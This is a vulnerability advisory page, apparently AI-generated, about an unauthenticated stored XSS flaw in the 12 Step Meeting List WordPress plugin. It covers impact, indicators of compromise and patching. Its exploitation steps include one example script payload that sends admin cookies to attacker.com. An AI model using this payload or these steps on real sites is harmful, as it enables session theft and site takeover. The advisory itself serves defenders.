CVE-2026-78333
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-78333 is an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in the 12 Step Meeting List WordPress plugin, affecting versions 3.17 through 3.19.16. The flaw allows unauthenticated attackers to inject malicious scripts via a geocode event log value that is stored in the plugin's activity log and later rendered in the WordPress admin area. It was publicly disclosed on August 25, 2026, with a patch released in version 3.19.17. The vulnerability carries a CVSS score of 8.8 (High) per WPScan, and is classified under CWE-79 (WPScan, Github Advisory).

Technical details

The root cause is improper input sanitization and output escaping (CWE-79): the plugin fails to sanitize a user-supplied value — specifically related to geocode data submitted during meeting list interactions — before storing it in its activity log. When an administrator views the activity log page in the WordPress admin area, the unsanitized value is rendered directly in the browser, triggering execution of any injected JavaScript. Because the submission endpoint is accessible to unauthenticated users, no authentication or special privileges are required to plant the payload. A proof-of-concept is scheduled for public release on September 25, 2026, giving site operators time to patch (WPScan).

Impact

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any high-privilege user (e.g., WordPress administrator) who views the affected admin area page. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and full site compromise. The stored nature of the attack means the payload persists and executes for every admin who views the log, amplifying the potential impact (WPScan, Github Advisory).

Exploitability

There is currently no public proof-of-concept exploit available; WPScan has indicated the PoC will be released on September 25, 2026. No evidence of in-the-wild exploitation has been reported at this time. The EPSS score is 0.0, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The low barrier to exploitation — requiring no authentication — makes this a notable risk once a PoC becomes public (WPScan, Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the 12 Step Meeting List plugin (versions 3.17–3.19.16) using tools like WPScan, Shodan, or by inspecting plugin directories on publicly accessible sites.
  2. Craft malicious payload: Prepare a JavaScript XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) to be injected into the geocode-related input field.
  3. Submit unauthenticated request: Send a crafted HTTP request to the plugin's geocode event endpoint without any authentication, embedding the malicious payload in the relevant parameter that gets written to the activity log.
  4. Wait for admin interaction: The payload is stored in the plugin's activity log. When an administrator navigates to the admin area page displaying the log, the browser renders and executes the injected script.
  5. Achieve objective: The executed script can exfiltrate session cookies, perform actions on behalf of the admin (e.g., create a backdoor account), or redirect the admin to a phishing page (WPScan).

Indicators of compromise

  • Network: Outbound HTTP requests from the admin's browser to unexpected external domains shortly after viewing the plugin's activity log page; unusual POST requests to the plugin's geocode endpoint from unknown or automated IP addresses.
  • Logs: WordPress access logs showing repeated unauthenticated POST requests to the 12 Step Meeting List plugin's geocode-related endpoint with anomalous or encoded parameter values.
  • File System: Unexpected new WordPress admin accounts or installed plugins not authorized by legitimate administrators.
  • Browser/Session: Administrators reporting unexpected logouts, session invalidation, or unauthorized changes to site settings after viewing the activity log page.

Mitigation and workarounds

Update the 12 Step Meeting List WordPress plugin to version 3.19.17 or later, which addresses the sanitization and escaping deficiencies. No official workaround short of patching has been published; as an interim measure, administrators should restrict access to the WordPress admin area using IP allowlisting or HTTP authentication. Sites should also audit their activity logs for suspicious entries and review recently created admin accounts or installed plugins for signs of prior exploitation (WPScan, Github Advisory).

Community reactions

The vulnerability was discovered and reported by security researcher Huseyn and verified by WPScan. No notable broader media coverage or significant social media discussion has been identified at this time, consistent with the early disclosure stage and the absence of a public PoC (WPScan).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78333NONEN/A
  • 12-step-meeting-list
NoYesAug 27, 2026
CVE-2026-78139NONEN/A
  • woocommerce-product-stock-alert
NoYesAug 27, 2026
CVE-2026-78138NONEN/A
  • finale-woocommerce-sales-countdown-timer-discount
NoYesAug 27, 2026
CVE-2026-78137NONEN/A
  • storegrowth-sales-booster
NoYesAug 27, 2026
CVE-2026-78125NONEN/A
  • learnpress-sepay-payment
NoYesAug 27, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management